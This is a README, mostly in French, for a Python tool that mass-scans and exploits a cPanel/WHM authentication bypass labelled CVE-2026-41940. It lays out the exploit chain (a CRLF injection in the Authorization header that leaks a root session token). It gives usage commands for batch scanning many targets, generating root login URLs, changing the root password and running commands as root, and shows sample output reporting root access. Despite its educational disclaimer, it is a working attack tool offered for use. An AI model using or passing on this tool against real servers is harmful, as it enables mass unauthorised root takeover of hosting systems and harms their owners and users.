
cPanel/WHM CVE-2026-41940 - Scanner de masse et exploiteur
Scanner et outil d'exploitation du contournement d'authentification cPanel/WHM pour CVE-2026-41940
Cet outil est fourni uniquement à des fins éducatives et pour des tests de sécurité autorisés.
En utilisant cet outil, vous acceptez que :
❗ L'auteur n'est PAS responsable des utilisations abusives, activités illégales, dommages ou conséquences juridiques résultant de l'utilisation de cet outil.
CVE-2026-41940 est une vulnérabilité critique de contournement d'authentification dans cPanel/WHM qui peut permettre à des attaquants d'obtenir un accès root non autorisé sans identifiants valides.
Cet outil fournit une implémentation en Python pour :
| Étape | Description |
|---|---|
| 1. Pré-authentification | Envoyer des identifiants invalides à /login/ pour obtenir le cookie whostmgrsession |
| 2. Injection CRLF | Injecter un retour à la ligne via l'en-tête Authorization: Basic pour divulguer le jeton cpsess |
| 3. Propagation du jeton | Déclencher do_token_denied pour propager le jeton dans le cache |
| 4. Vérification | Accéder à /json-api/version pour confirmer l'accès root WHM |
| Fonctionnalité | Description |
|---|---|
| 🔄 Scan par lots | Scanner plusieurs cibles simultanément |
| 🎯 Cible unique | Scanner une cible individuelle avec une sortie détaillée |
| 🔌 Scan de ports | Scan automatique des ports WHM (2082, 2083, 2086, 2087) |
| 🔓 URL de session | Générer une URL de connexion WHM en un clic |
| 💀 RCE | Exécuter des commandes système en tant que root |
| 🔑 Changer le mot de passe | Modifier le mot de passe root WHM |
| 📡 Appels API WHM | Appeler les fonctions de l'API WHM |
| 🎨 Sortie colorée | Sortie visuelle pour les résultats |
| 💾 Exporter les résultats | Enregistrer les cibles vulnérables dans un fichier |
Python 3.7+
pip install requests urllib3
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt
# Test with single target
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com
# Single target
python cpanel-mass-checker.py -u https://target.com:2087
# Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20
# Batch scan with port scanning
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt
# Generate session URL
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com
# Change root password
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com
# Execute command (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com
# WHM API call
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com
targets.txt)# Lines starting with # are comments
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083
| Paramètre | Description | Exemple |
|---|---|---|
| -u | URL de cible unique | -u https://target.com:2087 |
| -f | Fichier de liste de cibles | -f targets.txt |
| -c | Concurrence (threads) | -c 20 |
| -o | Fichier de sortie | -o results.txt |
| -hostname | En-tête Host personnalisé | -hostname cpanel.target.com |
| --scan-ports | Scanner tous les ports WHM | --scan-ports |
| -session | Générer une URL de connexion | -session |
| -passwd | Changer le mot de passe root | -passwd "NewPass123" |
| -cmd | Exécuter une commande | -cmd "id" |
| -keep | Conserver le compte temporaire | -keep |
| -api | Appeler l'API WHM | -api listaccts |
| -api-params | Paramètres de l'API | -api-params "user=root,password=123" |
[*] Total: 4 targets (after dedup), concurrency: 10
[*] Port scanning: ON (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410
[1/4] [SAFE] safe-target.com
------------------------------------------------------------
[*] Scan completed. Vulnerable: 1
[+] Results saved to result.txt
[0] hostname = example.com
[1] minting a preauth session...
[2] sending the CRLF injection...
[3] firing do_token_denied...
[4] verifying WHM root access...
[+] WHM root access obtained!
[+] Session URL:
https://example.com:2087/cpsessXXXXXXX/
| Champ | Valeur |
|---|---|
| CVE | CVE-2026-41940 |
| Sévérité | Critique (CVSS 9.8) |
| Vecteur d'attaque | Réseau |
| Privilèges requis | Aucun |
| Interaction utilisateur | Aucune |
-hostnamePour des tests sûrs et légaux :
Si ce projet vous a aidé, pensez à lui donner une ⭐